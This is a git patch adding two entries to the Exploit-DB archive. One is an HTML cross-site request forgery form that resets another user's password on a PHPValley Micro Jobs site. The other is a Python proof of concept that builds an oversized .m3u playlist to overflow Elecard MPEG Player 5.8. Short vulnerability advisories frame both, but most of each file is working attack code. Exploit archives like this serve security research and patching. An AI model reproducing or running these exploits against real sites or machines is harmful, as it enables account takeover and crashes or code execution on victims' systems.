From 0d57239a9adcfa57d9cb1ee68d24b7a986b6e3d3 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 21 Oct 2015 05:03:41 +0000
Subject: [PATCH] DB: 2015-10-21

2 new exploits
---
 files.csv                        |  2 ++
 platforms/php/webapps/38499.html | 17 ++++++++++++++++
 platforms/windows/dos/38498.py   | 33 ++++++++++++++++++++++++++++++++
 3 files changed, 52 insertions(+)
 create mode 100755 platforms/php/webapps/38499.html
 create mode 100755 platforms/windows/dos/38498.py

diff --git a/files.csv b/files.csv
index 899d0abc8..63c4e271e 100755
--- a/files.csv
+++ b/files.csv
@@ -34773,3 +34773,5 @@ id,file,description,date,author,platform,type,port
 38495,platforms/hardware/remote/38495.html,"Belkin F5D8236-4 Router Cross Site Request Forgery Vulnerability",2013-04-25,"Jacob Holcomb",hardware,remote,0
 38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple CSRF And Persistent XSS Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
 38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-based Blind SQL Injection Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
+38498,platforms/windows/dos/38498.py,"Elecard MPEG Player '.m3u' File Buffer Overflow Vulnerability",2013-04-27,metacom,windows,dos,0
+38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script Spoofing Vulnerability",2013-04-27,"Jason Whelan",php,webapps,0
diff --git a/platforms/php/webapps/38499.html b/platforms/php/webapps/38499.html
new file mode 100755
index 000000000..b18b29a3f
--- /dev/null
+++ b/platforms/php/webapps/38499.html
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/59536/info
+
+PHPValley Micro Jobs Site Script is prone to a vulnerability that allows attackers to spoof another user.
+
+Attackers can exploit this issue to spoof another user; other attacks are also possible.
+
+PHPValley Micro Jobs Site Script 1.01 is vulnerable; other versions may also be affected. 
+
+<!-- be logged into your own account, edit info below: -->
+<form method="post" action="http://webfiver.com/change_pass.php">
+<input name="changepass" type="hidden" value="Update" />
+Target Username: <input name="auser" type="text" />
+Your Password:   <input name="cpass" type="password" />
+ <input name="npass" type="hidden" value="jacked" />
+ <input name="npassc" type="hidden" value="jacked" />
+ <input type="submit" value="Jack" />
+</form>
\ No newline at end of file
diff --git a/platforms/windows/dos/38498.py b/platforms/windows/dos/38498.py
new file mode 100755
index 000000000..55283b2d4
--- /dev/null
+++ b/platforms/windows/dos/38498.py
@@ -0,0 +1,33 @@
+source: http://www.securityfocus.com/bid/59534/info
+
+Elecard MPEG Player is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
+
+Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+Elecard MPEG Player 5.8 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/python 
+# Exploit Title:Elecard MPEG Player 5.8 Local PoC 
+# Download link :www.elecard.com/assets/files/distribs/mpeg-player/EMpgPlayer.zip
+# Product: Vulnerable
+# Elecard MPEG Player,Elecard AVC HD Player
+# RST
+# Date (found): 27.04.2013
+# Date (publish): 27.04.2013
+# Author: metacom
+# version:5.8.121004
+# Category: poc
+# Tested on: windows 7 German  
+
+head="#EXTM3U\n"
+head+="#EXTINF:153,Artist - song\n"
+filename= "elecard.m3u"
+
+buffer= "\x41" * 783
+buffer+="\x42" * 4 
+buffer+="\x43" * 4
+buffer+="\x44" * 25000
+
+textfile = open(filename , 'w')
+textfile.write(head+buffer)
+textfile.close()